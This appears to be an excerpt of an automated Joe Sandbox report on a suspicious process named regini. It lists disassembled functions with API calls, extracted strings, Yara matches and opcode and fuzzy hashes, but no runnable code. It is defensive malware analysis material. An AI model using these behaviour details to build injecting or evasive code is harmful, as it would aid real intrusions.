                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9ddd8f375a75946d553088d32c5cda6e8298a4337d6d76d3e21cc12c9b10893f
                                                                              • Instruction ID: fc62bfb8653c70cf9b8df9f5a53c299f7a5d443f262af8a8b5e9f6836920bc68
                                                                              • Opcode Fuzzy Hash: 9ddd8f375a75946d553088d32c5cda6e8298a4337d6d76d3e21cc12c9b10893f
                                                                              • Instruction Fuzzy Hash: F1900232242441525945B1584404507400697E1241795C062E1518951C85269956D625
                                                                              Function 02B82D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 26607bead815ad330baa22514ad1f8e13f595c59e06b51c16503e5c396b5a444
                                                                              • Instruction ID: 3588c571cb12b5a81c4025b931c1e0af5a6193096432d1ab3f724b72d0f54c7c
                                                                              • Opcode Fuzzy Hash: 26607bead815ad330baa22514ad1f8e13f595c59e06b51c16503e5c396b5a444
                                                                              • Instruction Fuzzy Hash: 8290043330140003D540715C541C7074005D7F3301F55D071F051C555CDD15CD575337
                                                                              Function 02B82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: baf706ca9c26e8fdfd5b02d8e82bc69dfc49cba507f60549ec1b5f06b0fef3af
                                                                              • Instruction ID: 309e58bb743c8c270c4dedacf6fde240a17f999c097ac61f9ef0eff686a900c7
                                                                              • Opcode Fuzzy Hash: baf706ca9c26e8fdfd5b02d8e82bc69dfc49cba507f60549ec1b5f06b0fef3af
                                                                              • Instruction Fuzzy Hash: 7F90023A21340002D5807158540860B000587D2202F95D465E0119559CC91589695325
                                                                              Function 02B835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 95cfe43f8e6e7f75df5acd701fdfb916946222ad846466716811e01d9daf29e5
                                                                              • Instruction ID: 1867be5c54c8ab18bfb4d798608a6af3c6111295390171fb98a3adc7f48ea897
                                                                              • Opcode Fuzzy Hash: 95cfe43f8e6e7f75df5acd701fdfb916946222ad846466716811e01d9daf29e5
                                                                              • Instruction Fuzzy Hash: D490023260550402D50071584514707100587D1201F65C461E0528569D87958A5165A6
                                                                              Function 02B839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4a39e763b2612c377d5b2d351698c5a3e3dea554240980ba9bb4ba58b4555f68
                                                                              • Instruction ID: fa559f5523e00a2fec554a545b51fdc31bd2dcb890ce20b3f1503b7e24322861
                                                                              • Opcode Fuzzy Hash: 4a39e763b2612c377d5b2d351698c5a3e3dea554240980ba9bb4ba58b4555f68
                                                                              • Instruction Fuzzy Hash: FC90043334545103D550715C44047174005F7F1301F55C071F0D1C5D5DC555CD557335
                                                                              Function 0241103A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 459 241103a-2411044 460 2411046-241104d 459->460 461 241107e-2411081 459->461 462 2411096-24110ab 460->462 463 241104f-2411059 460->463 464 24110ad-24110c5 462->464 465 241112c-241114e 462->465 463->461 464->465 466 2411170-2411175 465->466 467 2411150-2411161 PostThreadMessageW 465->467 467->466 468 2411163-241116d 467->468 468->466
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                              • API String ID: 0-152878582
                                                                              • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                              • Instruction ID: 1193c7ab15b0fbd3b7ee442c728bff178e80d335e61a4867680ee4c617b4d76d
                                                                              • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                              • Instruction Fuzzy Hash: 9F114C72A453566AC713CFA48C41BDDBB649F42600F0486EBDA0C9F6C1D3B18D4BC795
                                                                              Function 024110E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 0241115D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 7046-nn1K$7046-nn1K
                                                                              • API String ID: 1836367815-59622768
                                                                              • Opcode ID: d7e9b385db7a893af6d06d15f612bd5b028044d3961f742fb336328be005be11
                                                                              • Instruction ID: b9ec8e4753e8bcc3631bfdcf81a2b7daa87a57529aa3d56ad415f371f87a4d3a
                                                                              • Opcode Fuzzy Hash: d7e9b385db7a893af6d06d15f612bd5b028044d3961f742fb336328be005be11
                                                                              • Instruction Fuzzy Hash: A901C471D4025876EB21AB928C41FDFBB7C9F41B90F00815AFB087B2C0D7B866068BE5
                                                                              Function 0241F799 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeUninitialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 3442037557-2016760708
                                                                              • Opcode ID: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                              • Instruction ID: 0790353b45020b37ff475e07804c00938ec3ce6244dd55527bc3d12d236dd0c4
                                                                              • Opcode Fuzzy Hash: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                              • Instruction Fuzzy Hash: 134152B6A00609AFDB00DFD9DC809EFB7B9FF88304B104559E515AB214D775AA05CFA0
                                                                              Function 02423CB0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000007D0), ref: 02423D8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: caf3f53cf78b67052efb43c6d0e36f4632bc381f8b2bc07a40985e89f40086ca
                                                                              • Instruction ID: 12a814343b2a9382d135f620b06725443507a1fc541cb9e6d514b51bc0f0f9cc
                                                                              • Opcode Fuzzy Hash: caf3f53cf78b67052efb43c6d0e36f4632bc381f8b2bc07a40985e89f40086ca
                                                                              • Instruction Fuzzy Hash: E3319CB0A01205BBD714DFA5C880FEBBBB9EB84700F40811EE91DAB240C7B46644CFA0
                                                                              Function 0241F7A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeUninitialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 3442037557-2016760708
                                                                              • Opcode ID: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                              • Instruction ID: d7be4e2e6dcaafaaa1762d95da292098b5f86a51c31fd34d79fd601f602eb101
                                                                              • Opcode Fuzzy Hash: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                              • Instruction Fuzzy Hash: FB313EB5A0060AAFDB00DFD9D8809EFB7B9FF88304B108559E515EB214D775EE06CBA0
                                                                              Function 02414900 Relevance: 1.6, APIs: 1, Instructions: 62libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 024148F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                              • Instruction ID: 19311ac196069876fe3a1e2f7a2f94a8dd05918ccf9a5d20252c5c054ae57e2d
                                                                              • Opcode Fuzzy Hash: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                              • Instruction Fuzzy Hash: 7601703AA4428C7BDF10EA74DC41AD9B778DF41745F044259D585E7602E632F60F8BC1
                                                                              Function 02414880 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 024148F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                              • Instruction ID: 4b172354a8529145839e537bd7419c784812d8b33bf5728ae0361a1101b36b2a
                                                                              • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                              • Instruction Fuzzy Hash: F90125B5D4024DA7DF10EBE5DC81FDEB3799B44708F104196E908A7281F671E718CB91
                                                                              Function 02429AE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,0241864E,00000010,?,?,?,00000044,?,00000010,0241864E,?,?,?), ref: 02429B40
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                              • Instruction ID: c42f18639258fdcb642b6831c64953a93e33a0f548cd7d9d78d9ca43a1e1f40e
                                                                              • Opcode Fuzzy Hash: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                              • Instruction Fuzzy Hash: F601C0B2201108BBCB44DF9ADC91EDB77ADAF8C714F008509BA09E3240D630F9518BA4
                                                                              Function 02409DE0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02409E25
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                              • Instruction ID: 32c61497c05692cecb5b4f6cd64f6a05830956a15526d9b624c7ce9549d546f4
                                                                              • Opcode Fuzzy Hash: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                              • Instruction Fuzzy Hash: 0DF0303379021436E62061EA9C42F9BB69DCB80B61F55402AF70CEA1C0D9A5B44146A4
                                                                              Function 02409DDC Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02409E25
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                              • Instruction ID: d95a02a955767baeede50eb47562b6b08cfaffc517dc60603068d17ea9abff36
                                                                              • Opcode Fuzzy Hash: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                              • Instruction Fuzzy Hash: 52F0923279031037E63062DACC82F8B769DCF84B60F11401AF70CEB2C0DAE5B8408AE5
                                                                              Function 02429A50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,024140EB,000000F4), ref: 02429A8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                              • Instruction ID: 11b0a7e0554a7a369f68f8c01e61a43b4c600779e45ccf950c4a71d40a6b9a89
                                                                              • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                              • Instruction Fuzzy Hash: 33E092712102147BD610EF5ADC41FDB3BADEFC5750F008419F908A7241C731B9108BB8
                                                                              Function 02429A00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(02411D69,?,02425DDA,02411D69,0242589E,02425DDA,?,02411D69,0242589E,00001000,?,?,00000000), ref: 02429A3F
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction ID: cdc4cc387a748c8dd13f0af97a93d29df79722f6325062526f3544901f9db3e8
                                                                              • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction Fuzzy Hash: 1EE06D712082157BCA10EE5ADC41FAB33ADEFC5710F004419F908A7241CB30B9108AB4
                                                                              Function 02418690 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 024186BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                              • Instruction ID: 5f28ab8fef136a7f1a8b01f2039197c180ec450b8f2f027aa473c10d7024dd2a
                                                                              • Opcode Fuzzy Hash: cbce35480b63f5581e3c40cdf66e398078c0d1383abfb7c38fdf9a54aebfa23b
                                                                              • Instruction Fuzzy Hash: 44E0867164030427FB246AB8DC45F6733689B48B28F584A61B91CDB3D1EB78F5014650
                                                                              Function 02418477 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02412060,024281DF,0242589E,02412023), ref: 024184B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                              • Instruction ID: 883790a3510e689cc65a1a915d524ab4bddc6f0f69e7203dad3d97ab64fe48a2
                                                                              • Opcode Fuzzy Hash: cb4f1fa0d927d0eb332dcaf108405a43969d706698edad673ee7f3d7385422b0
                                                                              • Instruction Fuzzy Hash: 92E08631A443047EFB509BF59C47F9A27A99B54394F04416AB90CE62C1EAA9A4014F64
                                                                              Function 02418480 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02412060,024281DF,0242589E,02412023), ref: 024184B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 5238db62bc8800101cee1923c7fb97072102e5e94c967eb6a009a61a8d4a7eea
                                                                              • Instruction ID: b903dd4fd292ffdc8c785d1fe8e01fa8fae65f7d418706061d0fba93478af068
                                                                              • Opcode Fuzzy Hash: 5238db62bc8800101cee1923c7fb97072102e5e94c967eb6a009a61a8d4a7eea
                                                                              • Instruction Fuzzy Hash: EED05E71A843043BF610AAE6DC87F16328DDB44794F458069B90CE62C2EEA8F0004AA5
                                                                              Function 02B82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 500c8c811459b47cbd6f1b2aa79603db7d7890e43dafdef468b485e5c516d8d1
                                                                              • Instruction ID: 0f2e97b10265e754a7c4d9a713968a76473436b57b58e2f3265d3b03970fff3f
                                                                              • Opcode Fuzzy Hash: 500c8c811459b47cbd6f1b2aa79603db7d7890e43dafdef468b485e5c516d8d1
                                                                              • Instruction Fuzzy Hash: 66B092729029C5CAEE11F7604A08B2B7A00ABD1701F2AC0B2E3174686E4738C1D1E6BA

                                                                              Non-executed Functions

                                                                              Function 02E604D8 Relevance: .1, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3756702610.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2e60000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f9faf44fc0a719ac5b8e1a663f872bc8667cff6f9682d8c059a1ae62bdb77ea
                                                                              • Instruction ID: 735b35edc1749d04193fb6d358f1cea2ef3fe48c17c1c315b1b35772db8fb737
                                                                              • Opcode Fuzzy Hash: 1f9faf44fc0a719ac5b8e1a663f872bc8667cff6f9682d8c059a1ae62bdb77ea
                                                                              • Instruction Fuzzy Hash: 04410B70598F4D4FD368EF68D085677B3E2FB45344F10A62DD98AC3252EB70E8428B85
                                                                              Function 02E6DDF9 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3756702610.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2e60000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                              • API String ID: 0-3558027158
                                                                              • Opcode ID: c50c5d711aa7f104fbc7c5df85f1a820149106898c39f028a156850a945b5dcf
                                                                              • Instruction ID: 61f7778df4ba1b0decf81455a22d26b17631110e6c91bc168844fe1e9843ede1
                                                                              • Opcode Fuzzy Hash: c50c5d711aa7f104fbc7c5df85f1a820149106898c39f028a156850a945b5dcf
                                                                              • Instruction Fuzzy Hash: F99160F04482988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                              Function 02B82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: c9153ae037909b6f397806d6158fb633aa5997c4b0e60c87a29d3b8384b18d73
                                                                              • Instruction ID: 96d1a1c599d53c97e0dfe6874f7b44e1021b388cb9f6d02a760cfda495cbc6de
                                                                              • Opcode Fuzzy Hash: c9153ae037909b6f397806d6158fb633aa5997c4b0e60c87a29d3b8384b18d73
                                                                              • Instruction Fuzzy Hash: 8851A6B6A00156BFDF21EB98889097EF7B8FF4820075481A9E969D7641D374EE50CBA0
                                                                              Function 02BF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
